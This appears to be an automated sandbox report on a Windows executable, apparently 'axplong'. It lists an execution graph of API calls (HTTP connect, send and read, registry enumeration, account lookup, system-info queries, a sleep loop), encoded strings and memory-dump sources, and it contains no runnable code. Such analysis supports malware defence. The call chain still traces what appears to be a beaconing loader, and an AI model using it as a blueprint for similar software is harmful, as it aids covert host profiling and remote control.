                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:7.8%
                        Total number of Nodes:601
                        Total number of Limit Nodes:41
                        execution_graph 14571 bfb85e 14576 bfb6e5 14571->14576 14573 bfb886 14584 bfb648 14573->14584 14575 bfb89f 14577 bfb6f1 Concurrency::details::_Reschedule_chore 14576->14577 14578 bfb722 14577->14578 14594 bfc5dc 14577->14594 14578->14573 14582 bfb70c __Mtx_unlock 14583 be2ad0 10 API calls 14582->14583 14583->14578 14585 bfb654 Concurrency::details::_Reschedule_chore 14584->14585 14586 bfb6ae 14585->14586 14587 bfc5dc GetSystemTimePreciseAsFileTime 14585->14587 14586->14575 14588 bfb669 14587->14588 14589 be2ad0 10 API calls 14588->14589 14590 bfb66f __Mtx_unlock 14589->14590 14591 be2ad0 10 API calls 14590->14591 14592 bfb68c __Cnd_broadcast 14591->14592 14592->14586 14593 be2ad0 10 API calls 14592->14593 14593->14586 14602 bfc382 14594->14602 14596 bfb706 14597 be2ad0 14596->14597 14598 be2adc 14597->14598 14599 be2ada 14597->14599 14619 bfc19a 14598->14619 14599->14582 14603 bfc3aa 14602->14603 14604 bfc3d8 14602->14604 14603->14596 14604->14603 14608 bfce9b 14604->14608 14606 bfc42d __Xtime_diff_to_millis2 14606->14603 14607 bfce9b _xtime_get GetSystemTimePreciseAsFileTime 14606->14607 14607->14606 14609 bfceaa 14608->14609 14611 bfceb7 __aulldvrm 14608->14611 14609->14611 14612 bfce74 14609->14612 14611->14606 14615 bfcb1a 14612->14615 14616 bfcb2b GetSystemTimePreciseAsFileTime 14615->14616 14618 bfcb37 14615->14618 14616->14618 14618->14611 14620 bfc1c2 14619->14620 14622 bfc1a4 14619->14622 14620->14620 14622->14620 14623 bfc1c7 14622->14623 14626 be2aa0 14623->14626 14625 bfc1de std::_Xinvalid_argument 14625->14622 14640 bfbe0f 14626->14640 14628 be2abf 14628->14625 14629 c18aaf __cftof 4 API calls 14630 c16c26 14629->14630 14632 c16c43 14630->14632 14633 c16c35 14630->14633 14631 be2ab4 14631->14628 14631->14629 14635 c168bd 4 API calls 14632->14635 14634 c16c99 9 API calls 14633->14634 14636 c16c3f 14634->14636 14637 c16c5d 14635->14637 14636->14625 14638 c16c99 9 API calls 14637->14638 14639 c16c71 __freea 14637->14639 14638->14639 14639->14625 14643 bfcb61 14640->14643 14644 bfcb6f InitOnceExecuteOnce 14643->14644 14646 bfbe22 14643->14646 14644->14646 14646->14631 14106 c16beb 14113 c16bf7 14106->14113 14108 c16c26 14109 c16c43 14108->14109 14110 c16c35 14108->14110 14126 c168bd 14109->14126 14111 c16c99 9 API calls 14110->14111 14114 c16c3f 14111->14114 14118 c18aaf 14113->14118 14115 c16c71 __freea 14116 c16c5d 14116->14115 14129 c16c99 14116->14129 14119 c18ab4 __cftof 14118->14119 14122 c18abf 14119->14122 14141 c1d4f4 14119->14141 14138 c1651d 14122->14138 14123 c18af2 __cftof 14124 c1d727 RtlAllocateHeap 14123->14124 14125 c1d73a __dosmaperr 14123->14125 14124->14123 14124->14125 14125->14108 14160 c1683a 14126->14160 14128 c168cf 14128->14116 14130 c16cc4 __cftof 14129->14130 14133 c16ca7 __cftof __dosmaperr 14129->14133 14131 c16d06 CreateFileW 14130->14131 14132 c16cea __cftof __dosmaperr 14130->14132 14134 c16d38 14131->14134 14135 c16d2a 14131->14135 14132->14115 14133->14115 14210 c16d77 14134->14210 14196 c16e01 GetFileType 14135->14196 14148 c163f7 14138->14148 14142 c1d500 __cftof 14141->14142 14143 c1651d __cftof 2 API calls 14142->14143 14144 c1d55c __cftof __dosmaperr 14142->14144 14147 c1d6ee __cftof 14143->14147 14144->14122 14145 c1d727 RtlAllocateHeap 14146 c1d73a __dosmaperr 14145->14146 14145->14147 14146->14122 14147->14145 14147->14146 14149 c16405 __cftof 14148->14149 14150 c16450 14149->14150 14153 c1645b 14149->14153 14150->14123 14158 c1a1c2 GetPEB 14153->14158 14155 c16465 14156 c1646a GetPEB 14155->14156 14157 c1647a __cftof 14155->14157 14156->14157 14159 c1a1dc __cftof 14158->14159 14159->14155 14161 c16851 14160->14161 14162 c1685a 14160->14162 14161->14128 14162->14161 14166 c1b4bb 14162->14166 14167 c16890 14166->14167 14168 c1b4ce 14166->14168 14170 c1b4e8 14167->14170 14168->14167 14174 c1f46b 14168->14174 14171 c1b510 14170->14171 14172 c1b4fb 14170->14172 14171->14161 14172->14171 14179 c1e571 14172->14179 14176 c1f477 __cftof 14174->14176 14175 c1f4c6 14175->14167 14176->14175 14177 c18aaf __cftof 4 API calls 14176->14177 14178 c1f4eb 14177->14178 14180 c1e57b 14179->14180 14183 c1e489 14180->14183 14182 c1e581 14182->14171 14187 c1e495 __cftof __freea 14183->14187 14184 c1e4b6 14184->14182 14185 c18aaf __cftof 4 API calls 14186 c1e528 14185->14186 14188 c1e564 14186->14188 14192 c1a5ee 14186->14192 14187->14184 14187->14185 14188->14182 14193 c1a611 14192->14193 14194 c18aaf __cftof 4 API calls 14193->14194 14195 c1a687 14194->14195 14197 c16e3c 14196->14197 14200 c16ed2 __dosmaperr 14196->14200 14198 c16e56 __cftof 14197->14198 14232 c17177 14197->14232 14198->14200 14201 c16e75 GetFileInformationByHandle 14198->14201 14200->14132 14201->14200 14202 c16e8b 14201->14202 14218 c170c9 14202->14218 14206 c16ea8 14207 c16f71 SystemTimeToTzSpecificLocalTime 14206->14207 14208 c16ebb 14207->14208 14209 c16f71 SystemTimeToTzSpecificLocalTime 14208->14209 14209->14200 14255 c17314 14210->14255 14212 c16d85 14213 c16d8a __dosmaperr 14212->14213 14214 c170c9 4 API calls 14212->14214 14213->14132 14215 c16da3 14214->14215 14216 c17177 RtlAllocateHeap 14215->14216 14217 c16dc2 14216->14217 14217->14132 14219 c170df _wcsrchr 14218->14219 14227 c16e97 14219->14227 14236 c1b9e4 14219->14236 14221 c17123 14222 c1b9e4 4 API calls 14221->14222 14221->14227 14223 c17134 14222->14223 14224 c1b9e4 4 API calls 14223->14224 14223->14227 14225 c17145 14224->14225 14226 c1b9e4 4 API calls 14225->14226 14225->14227 14226->14227 14228 c16f71 14227->14228 14229 c16f89 14228->14229 14230 c16fa9 SystemTimeToTzSpecificLocalTime 14229->14230 14231 c16f8f 14229->14231 14230->14231 14231->14206 14233 c17190 14232->14233 14235 c171a4 __dosmaperr 14233->14235 14247 c1b568 14233->14247 14235->14198 14238 c1b9f2 14236->14238 14240 c1b9f8 __cftof __dosmaperr 14238->14240 14241 c1ba2d 14238->14241 14239 c1ba28 14239->14221 14240->14221 14242 c1ba57 14241->14242 14244 c1ba3d __cftof __dosmaperr 14241->14244 14243 c1683a __cftof 4 API calls 14242->14243 14242->14244 14246 c1ba81 14243->14246 14244->14239 14245 c1b9a5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14245->14246 14246->14244 14246->14245 14248 c1b592 __cftof 14247->14248 14250 c1b5ae __dosmaperr __freea 14248->14250 14251 c1d6ef 14248->14251 14250->14235 14254 c1d6fc __cftof 14251->14254 14252 c1d727 RtlAllocateHeap 14253 c1d73a __dosmaperr 14252->14253 14252->14254 14253->14250 14254->14252 14254->14253 14256 c17338 14255->14256 14258 c1733e 14256->14258 14259 c17036 14256->14259 14258->14212 14260 c17042 __dosmaperr 14259->14260 14265 c1b87b 14260->14265 14262 c1705a __dosmaperr 14263 c17068 14262->14263 14264 c1b87b RtlAllocateHeap 14262->14264 14263->14258 14264->14263 14268 c1b6de 14265->14268 14267 c1b894 14267->14262 14269 c1b6ee 14268->14269 14271 c1b6f5 14269->14271 14272 c21ef8 14269->14272 14271->14267 14275 c21d22 14272->14275 14274 c21f0f 14274->14271 14276 c21d54 14275->14276 14278 c21d40 __cftof __dosmaperr 14275->14278 14277 c1b568 RtlAllocateHeap 14276->14277 14276->14278 14277->14278 14278->14274 14279 c1d6ef 14282 c1d6fc __cftof 14279->14282 14280 c1d727 RtlAllocateHeap 14281 c1d73a __dosmaperr 14280->14281 14280->14282 14282->14280 14282->14281 14406 be86b0 14407 be86b6 14406->14407 14408 c16659 RtlAllocateHeap 14407->14408 14409 be86c3 14408->14409 14410 be86d6 14409->14410 14411 c166e7 4 API calls 14409->14411 14412 be86d0 14411->14412 14543 bee410 14544 bee435 14543->14544 14546 bee419 14543->14546 14546->14544 14547 bee270 14546->14547 14548 bee280 __dosmaperr 14547->14548 14549 c18979 4 API calls 14548->14549 14551 bee2bd std::_Xinvalid_argument 14549->14551 14550 bee435 14550->14546 14551->14550 14552 bee270 4 API calls 14551->14552 14552->14551 14658 bedfd0 recv 14659 bee032 recv 14658->14659 14660 bee067 recv 14659->14660 14661 bee0a1 14660->14661 14662 bee1c3 14661->14662 14663 bfc5dc GetSystemTimePreciseAsFileTime 14661->14663 14664 bee1fe 14663->14664 14665 bfc19a 10 API calls 14664->14665 14666 bee268 14665->14666 14283 bf1dd0 14287 bf1e6b shared_ptr __dosmaperr 14283->14287 14284 bf1e78 14286 bee440 6 API calls 14284->14286 14285 bf2936 shared_ptr std::_Xinvalid_argument 14286->14285 14287->14284 14287->14285 14300 c18979 14287->14300 14289 bf2265 shared_ptr 14289->14285 14304 c16659 14289->14304 14293 bf268b shared_ptr __dosmaperr 14293->14285 14294 c18979 4 API calls 14293->14294 14295 bf2759 14294->14295 14295->14284 14295->14285 14296 bf27d1 14295->14296 14311 bee440 14296->14311 14298 bf2843 14298->14285 14329 be5df0 14298->14329 14301 c18994 14300->14301 14336 c186d7 14301->14336 14303 c1899e 14303->14289 14360 c165a2 14304->14360 14306 bf267a 14306->14284 14307 c166e7 14306->14307 14308 c166f3 14307->14308 14310 c166fd __cftof __dosmaperr 14308->14310 14372 c16670 14308->14372 14310->14293 14312 bee489 14311->14312 14395 bebd60 14312->14395 14314 bee9a9 shared_ptr 14314->14298 14315 bee711 14315->14314 14316 bee440 6 API calls 14315->14316 14318 bef696 14316->14318 14317 bef892 shared_ptr 14317->14298 14318->14317 14319 bee440 6 API calls 14318->14319 14321 bef973 14319->14321 14320 befa45 shared_ptr 14320->14298 14321->14320 14322 c16659 RtlAllocateHeap 14321->14322 14323 befbf1 14322->14323 14324 bee440 6 API calls 14323->14324 14326 bf054c 14324->14326 14325 bf0790 shared_ptr 14325->14298 14326->14325 14327 bee440 6 API calls 14326->14327 14328 bf11f9 14327->14328 14331 be5e28 14329->14331 14330 be5f0e shared_ptr 14330->14285 14331->14330 14332 be6060 RegOpenKeyExA 14331->14332 14334 be645a shared_ptr 14332->14334 14335 be60b3 __cftof 14332->14335 14333 be6153 RegEnumValueW 14333->14335 14334->14285 14335->14333 14335->14334 14337 c186e9 14336->14337 14338 c1683a __cftof 4 API calls 14337->14338 14341 c186fe __cftof __dosmaperr 14337->14341 14340 c1872e 14338->14340 14340->14341 14342 c18925 14340->14342 14341->14303 14343 c18962 14342->14343 14344 c18932 14342->14344 14353 c1d2e9 14343->14353 14345 c18941 __fassign 14344->14345 14348 c1d30d 14344->14348 14345->14340 14349 c1683a __cftof 4 API calls 14348->14349 14350 c1d32a 14349->14350 14352 c1d33a 14350->14352 14357 c1f07f 14350->14357 14352->14345 14354 c1d2f4 14353->14354 14355 c1b4bb __cftof 4 API calls 14354->14355 14356 c1d304 14355->14356 14356->14345 14358 c1683a __cftof 4 API calls 14357->14358 14359 c1f09f __cftof __fassign __freea 14358->14359 14359->14352 14361 c165ae 14360->14361 14362 c165b5 __cftof __dosmaperr 14361->14362 14364 c1a783 14361->14364 14362->14306 14365 c1a78f 14364->14365 14368 c1a827 14365->14368 14367 c1a7aa 14367->14362 14369 c1a84a 14368->14369 14370 c1d6ef RtlAllocateHeap 14369->14370 14371 c1a890 __freea 14369->14371 14370->14371 14371->14367 14373 c16692 14372->14373 14374 c1667d __cftof __dosmaperr __freea 14372->14374 14373->14374 14376 c19ef9 14373->14376 14374->14310 14377 c19f36 14376->14377 14378 c19f11 14376->14378 14377->14374 14378->14377 14380 c202f8 14378->14380 14381 c20304 14380->14381 14383 c2030c __cftof __dosmaperr 14381->14383 14384 c203ea 14381->14384 14383->14377 14385 c2040c 14384->14385 14387 c20410 __cftof __dosmaperr 14384->14387 14385->14387 14388 c1fb7f 14385->14388 14387->14383 14389 c1fbcc 14388->14389 14390 c1683a __cftof 4 API calls 14389->14390 14393 c1fbdb __cftof 14390->14393 14391 c1d2e9 4 API calls 14391->14393 14392 c1c4ea GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __fassign 14392->14393 14393->14391 14393->14392 14394 c1fe7b 14393->14394 14394->14387 14396 bebdb2 14395->14396 14398 bec14e shared_ptr 14395->14398 14397 bebdc6 InternetOpenW InternetConnectA 14396->14397 14396->14398 14399 bebe3d 14397->14399 14398->14315 14400 bebe53 HttpOpenRequestA 14399->14400 14401 bebe71 shared_ptr 14400->14401 14402 bebf13 HttpSendRequestA 14401->14402 14403 bebf2b shared_ptr 14402->14403 14404 bebfb3 InternetReadFile 14403->14404 14405 bebfda 14404->14405 14670 bf9310 14671 bf9325 14670->14671 14675 bf9363 14670->14675 14672 bfd041 SleepConditionVariableCS 14671->14672 14673 bf932f 14672->14673 14674 bfcff7 RtlWakeAllConditionVariable 14673->14674 14673->14675 14674->14675 14676 c16974 14677 c16982 14676->14677 14678 c1698c 14676->14678 14679 c168bd 4 API calls 14678->14679 14680 c169a6 __freea 14679->14680 14647 bfb7e9 14648 bfb6e5 11 API calls 14647->14648 14649 bfb811 Concurrency::details::_Reschedule_chore 14648->14649 14650 bfb836 14649->14650 14654 bfcade 14649->14654 14652 bfb648 11 API calls 14650->14652 14653 bfb84e 14652->14653 14655 bfcafc 14654->14655 14656 bfcaec TpCallbackUnloadDllOnCompletion 14654->14656 14655->14650 14656->14655 14667 c16559 14668 c163f7 __cftof 2 API calls 14667->14668 14669 c1656a 14668->14669 14553 be7400 14554 be7435 shared_ptr 14553->14554 14558 be752f shared_ptr 14554->14558 14559 bfd041 14554->14559 14556 be75bd 14556->14558 14563 bfcff7 14556->14563 14561 bfd052 14559->14561 14560 bfd05a 14560->14556 14561->14560 14567 bfd0c9 14561->14567 14564 bfd007 14563->14564 14565 bfd0ab RtlWakeAllConditionVariable 14564->14565 14566 bfd0af 14564->14566 14565->14558 14566->14558 14568 bfd0d7 SleepConditionVariableCS 14567->14568 14570 bfd0f0 14567->14570 14568->14570 14570->14561 14413 bf6ae0 14414 bf6b10 14413->14414 14417 bf46c0 14414->14417 14416 bf6b5c Sleep 14416->14414 14419 bf4d80 shared_ptr 14417->14419 14421 bf46fb 14417->14421 14418 bf4e69 shared_ptr 14418->14416 14419->14418 14445 be65b0 14419->14445 14421->14419 14423 bebd60 5 API calls 14421->14423 14422 bf4f25 shared_ptr 14425 bf4fee shared_ptr 14422->14425 14428 bf6ab6 14422->14428 14433 bf4753 shared_ptr __dosmaperr 14423->14433 14455 be7d00 14425->14455 14426 bf4ffd 14461 be82b0 14426->14461 14430 bf46c0 17 API calls 14428->14430 14429 bf4a0d 14429->14419 14431 bebd60 5 API calls 14429->14431 14432 bf6b5c Sleep 14430->14432 14435 bf4a72 shared_ptr 14431->14435 14432->14428 14433->14429 14434 c18979 4 API calls 14433->14434 14434->14429 14435->14419 14438 bf42a0 14435->14438 14437 bf5016 shared_ptr 14437->14416 14439 bf42e2 14438->14439 14441 bf4556 14439->14441 14443 bf4308 shared_ptr 14439->14443 14440 bf4520 shared_ptr 14440->14419 14442 bf3550 14 API calls 14441->14442 14442->14440 14443->14440 14465 bf3550 14443->14465 14454 4f80759 14445->14454 14446 be660f LookupAccountNameA 14447 be6662 14446->14447 14448 be2280 4 API calls 14447->14448 14449 be6699 shared_ptr 14448->14449 14450 be2280 4 API calls 14449->14450 14451 be6822 shared_ptr 14449->14451 14452 be6727 shared_ptr 14450->14452 14451->14422 14452->14451 14453 be2280 4 API calls 14452->14453 14453->14452 14454->14446 14456 be7d66 shared_ptr __cftof 14455->14456 14457 be7ea3 GetNativeSystemInfo 14456->14457 14458 be7ea7 14456->14458 14460 be7eb8 shared_ptr 14456->14460 14457->14458 14458->14460 14540 c18a81 14458->14540 14460->14426 14464 be8315 shared_ptr __cftof 14461->14464 14462 be8333 14462->14437 14463 be8454 GetNativeSystemInfo 14463->14462 14464->14462 14464->14463 14466 bf358f shared_ptr 14465->14466 14473 bf3ab2 shared_ptr std::_Xinvalid_argument 14465->14473 14471 bf38f5 shared_ptr __dosmaperr 14466->14471 14466->14473 14476 beaca0 14466->14476 14467 c18979 4 API calls 14469 bf3a8a 14467->14469 14470 bf3e52 14469->14470 14469->14473 14474 bf3b9d 14469->14474 14498 bf2e20 14470->14498 14471->14467 14471->14473 14473->14443 14481 bf1dd0 14474->14481 14478 beadf0 __cftof 14476->14478 14477 beae16 shared_ptr 14477->14471 14478->14477 14513 be5500 14478->14513 14480 beaf7e 14485 bf1e6b shared_ptr __dosmaperr 14481->14485 14482 bf1e78 14484 bee440 6 API calls 14482->14484 14483 bf2936 shared_ptr std::_Xinvalid_argument 14483->14473 14484->14483 14485->14482 14485->14483 14486 c18979 4 API calls 14485->14486 14487 bf2265 shared_ptr 14486->14487 14487->14483 14488 c16659 RtlAllocateHeap 14487->14488 14489 bf267a 14488->14489 14489->14482 14490 c166e7 4 API calls 14489->14490 14491 bf268b shared_ptr __dosmaperr 14490->14491 14491->14483 14492 c18979 4 API calls 14491->14492 14493 bf2759 14492->14493 14493->14482 14493->14483 14494 bf27d1 14493->14494 14495 bee440 6 API calls 14494->14495 14496 bf2843 14495->14496 14496->14483 14497 be5df0 2 API calls 14496->14497 14497->14483 14499 bf2ec5 __cftof 14498->14499 14500 bf32f2 InternetCloseHandle InternetCloseHandle 14499->14500 14501 bf3331 14500->14501 14502 bee440 6 API calls 14501->14502 14504 bf3423 shared_ptr 14502->14504 14503 bf351a shared_ptr std::_Xinvalid_argument 14503->14473 14504->14503 14505 bf38f5 shared_ptr __dosmaperr 14504->14505 14507 beaca0 4 API calls 14504->14507 14505->14503 14506 c18979 4 API calls 14505->14506 14508 bf3a8a 14506->14508 14507->14505 14508->14503 14509 bf3e52 14508->14509 14511 bf3b9d 14508->14511 14510 bf2e20 12 API calls 14509->14510 14510->14503 14512 bf1dd0 12 API calls 14511->14512 14512->14503 14514 be5520 14513->14514 14514->14514 14516 be5620 14514->14516 14517 be2280 14514->14517 14516->14480 14520 be2240 14517->14520 14521 be2256 14520->14521 14524 c18667 14521->14524 14527 c17456 14524->14527 14526 be2264 14526->14514 14528 c17496 14527->14528 14532 c1747e __cftof __dosmaperr 14527->14532 14529 c1683a __cftof 4 API calls 14528->14529 14528->14532 14530 c174ae 14529->14530 14533 c17a11 14530->14533 14532->14526 14535 c17a22 14533->14535 14534 c17a31 __cftof __dosmaperr 14534->14532 14535->14534 14536 c17fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14535->14536 14537 c17c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14535->14537 14538 c17c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14535->14538 14539 c17d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 14535->14539 14536->14535 14537->14535 14538->14535 14539->14535 14541 c186d7 4 API calls 14540->14541 14542 c18a9f 14541->14542 14542->14460 14681 bf8700 14682 bf875a __cftof 14681->14682 14688 bf9ae0 14682->14688 14684 bf8784 14685 bf879c 14684->14685 14692 be43b0 14684->14692 14687 bf8809 std::_Throw_future_error 14689 bf9b15 14688->14689 14698 be2ca0 14689->14698 14691 bf9b46 14691->14684 14693 bfbe0f InitOnceExecuteOnce 14692->14693 14694 be43ca 14693->14694 14695 be43d1 14694->14695 14696 c16beb 9 API calls 14694->14696 14695->14687 14697 be43e4 14696->14697 14699 be2cdd 14698->14699 14700 bfbe0f InitOnceExecuteOnce 14699->14700 14701 be2d06 14700->14701 14702 be2d48 14701->14702 14703 be2d11 14701->14703 14707 bfbe27 14701->14707 14714 be2400 14702->14714 14703->14691 14708 bfbe33 std::_Xinvalid_argument 14707->14708 14709 bfbe9a 14708->14709 14710 bfbea3 14708->14710 14717 bfbdaf 14709->14717 14712 be2aa0 10 API calls 14710->14712 14713 bfbe9f 14712->14713 14713->14702 14735 bfb506 14714->14735 14716 be2432 14718 bfcb61 InitOnceExecuteOnce 14717->14718 14719 bfbdc7 14718->14719 14720 bfbdce 14719->14720 14723 c16beb 14719->14723 14720->14713 14722 bfbdd7 14722->14713 14730 c16bf7 14723->14730 14724 c18aaf __cftof 4 API calls 14725 c16c26 14724->14725 14726 c16c43 14725->14726 14727 c16c35 14725->14727 14729 c168bd 4 API calls 14726->14729 14728 c16c99 9 API calls 14727->14728 14731 c16c3f 14728->14731 14733 c16c5d 14729->14733 14730->14724 14731->14722 14732 c16c71 __freea 14732->14722 14733->14732 14734 c16c99 9 API calls 14733->14734 14734->14732 14736 bfb521 std::_Xinvalid_argument 14735->14736 14737 c18aaf __cftof 4 API calls 14736->14737 14739 bfb588 __cftof 14736->14739 14738 bfb5cf 14737->14738 14739->14716 14740 bfa140 14741 bfa1c0 14740->14741 14747 bf7040 14741->14747 14743 bfa3ee shared_ptr 14744 bfa1fc shared_ptr 14744->14743 14751 be3ea0 14744->14751 14746 bfa3d6 14749 bf7081 __cftof __Mtx_init_in_situ 14747->14749 14748 bf72b6 14748->14744 14749->14748 14757 be2e80 14749->14757 14752 be3ede 14751->14752 14753 be3f08 14751->14753 14752->14746 14754 be3f18 14753->14754 14800 be2bc0 14753->14800 14754->14746 14758 be2ec6 14757->14758 14762 be2f2f 14757->14762 14759 bfc5dc GetSystemTimePreciseAsFileTime 14758->14759 14760 be2ed2 14759->14760 14763 be2fde 14760->14763 14767 be2edd __Mtx_unlock 14760->14767 14761 be2faf 14761->14748 14762->14761 14768 bfc5dc GetSystemTimePreciseAsFileTime 14762->14768 14764 bfc19a 10 API calls 14763->14764 14765 be2fe4 14764->14765 14766 bfc19a 10 API calls 14765->14766 14769 be2f79 14766->14769 14767->14762 14767->14765 14768->14769 14770 bfc19a 10 API calls 14769->14770 14771 be2f80 __Mtx_unlock 14769->14771 14770->14771 14772 bfc19a 10 API calls 14771->14772 14773 be2f98 __Cnd_broadcast 14771->14773 14772->14773 14773->14761 14774 bfc19a 10 API calls 14773->14774 14775 be2ffc 14774->14775 14776 bfc5dc GetSystemTimePreciseAsFileTime 14775->14776 14786 be3040 shared_ptr __Mtx_unlock 14776->14786 14777 be3185 14778 bfc19a 10 API calls 14777->14778 14779 be318b 14778->14779 14780 bfc19a 10 API calls 14779->14780 14781 be3191 14780->14781 14782 bfc19a 10 API calls 14781->14782 14788 be3153 __Mtx_unlock 14782->14788 14783 be3167 14783->14748 14784 bfc19a 10 API calls 14785 be319d 14784->14785 14786->14777 14786->14779 14786->14783 14787 bfc5dc GetSystemTimePreciseAsFileTime 14786->14787 14789 be311f 14787->14789 14788->14783 14788->14784 14789->14777 14789->14781 14789->14788 14791 bfbc7c 14789->14791 14794 bfbaa2 14791->14794 14793 bfbc8c 14793->14789 14795 bfbacc 14794->14795 14796 bfbad4 __Xtime_diff_to_millis2 14795->14796 14797 bfce9b _xtime_get GetSystemTimePreciseAsFileTime 14795->14797 14796->14793 14798 bfbaff __Xtime_diff_to_millis2 14797->14798 14798->14796 14799 bfce9b _xtime_get GetSystemTimePreciseAsFileTime 14798->14799 14799->14796 14801 be2bce 14800->14801 14807 bfb777 14801->14807 14803 be2c02 14804 be2c09 14803->14804 14813 be2c40 14803->14813 14804->14746 14806 be2c18 std::_Xinvalid_argument 14808 bfb784 14807->14808 14812 bfb7a3 Concurrency::details::_Reschedule_chore 14807->14812 14816 bfcaa7 14808->14816 14810 bfb794 14810->14812 14818 bfb74e 14810->14818 14812->14803 14824 bfb72b 14813->14824 14815 be2c72 shared_ptr 14815->14806 14817 bfcac2 CreateThreadpoolWork 14816->14817 14817->14810 14819 bfb757 Concurrency::details::_Reschedule_chore 14818->14819 14822 bfccfc 14819->14822 14821 bfb771 14821->14812 14823 bfcd11 TpPostWork 14822->14823 14823->14821 14825 bfb737 14824->14825 14827 bfb747 14824->14827 14825->14827 14828 bfc9a8 14825->14828 14827->14815 14829 bfc9bd TpReleaseWork 14828->14829 14829->14827

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 760 bebd60-bebdac 761 bebdb2-bebdb6 760->761 762 bec1a1-bec1c6 call bf7f30 760->762 761->762 763 bebdbc-bebdc0 761->763 768 bec1c8-bec1d4 762->768 769 bec1f4-bec20c 762->769 763->762 765 bebdc6-bebe4f InternetOpenW InternetConnectA call bf7870 call be5b20 763->765 793 bebe53-bebe6f HttpOpenRequestA 765->793 794 bebe51 765->794 771 bec1ea-bec1f1 call bfd593 768->771 772 bec1d6-bec1e4 768->772 773 bec158-bec170 769->773 774 bec212-bec21e 769->774 771->769 772->771 780 bec26f-bec274 call c16b9a 772->780 777 bec176-bec182 773->777 778 bec243-bec25f call bfcf21 773->778 775 bec14e-bec155 call bfd593 774->775 776 bec224-bec232 774->776 775->773 776->780 783 bec234 776->783 784 bec188-bec196 777->784 785 bec239-bec240 call bfd593 777->785 783->775 784->780 792 bec19c 784->792 785->778 792->785 798 bebea0-bebf0f call bf7870 call be5b20 call bf7870 call be5b20 793->798 799 bebe71-bebe80 793->799 794->793 812 bebf13-bebf29 HttpSendRequestA 798->812 813 bebf11 798->813 800 bebe96-bebe9d call bfd593 799->800 801 bebe82-bebe90 799->801 800->798 801->800 814 bebf5a-bebf82 812->814 815 bebf2b-bebf3a 812->815 813->812 818 bebf84-bebf93 814->818 819 bebfb3-bebfd4 InternetReadFile 814->819 816 bebf3c-bebf4a 815->816 817 bebf50-bebf57 call bfd593 815->817 816->817 817->814 822 bebfa9-bebfb0 call bfd593 818->822 823 bebf95-bebfa3 818->823 820 bebfda 819->820 825 bebfe0-bec090 call c14180 820->825 822->819 823->822
                        APIs
                        • InternetOpenW.WININET(00C38D70,00000000,00000000,00000000,00000000), ref: 00BEBDED
                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00BEBE11
                        • HttpOpenRequestA.WININET(?,00000000), ref: 00BEBE5B
                        • HttpSendRequestA.WININET(?,00000000), ref: 00BEBF1A
                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 00BEBFCD
                        • InternetCloseHandle.WININET(?), ref: 00BEC0A7
                        • InternetCloseHandle.WININET(?), ref: 00BEC0AF
                        • InternetCloseHandle.WININET(?), ref: 00BEC0B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                        • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                        • API String ID: 688256393-332458646
                        • Opcode ID: c2bec4dd9b51a4a2ad0aa5a64294a25fe32cdf5679f69932502415dc8b777879
                        • Instruction ID: e575fd2071a634acadbf2c0b4c448b995ead52116d7be15ce1890b5489bf77ab
                        • Opcode Fuzzy Hash: c2bec4dd9b51a4a2ad0aa5a64294a25fe32cdf5679f69932502415dc8b777879
                        • Instruction Fuzzy Hash: C2B1E3B0A001589BEB24CF29CC85BEEBBB5EF45304F5045E9F50897282DB719AC5CF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
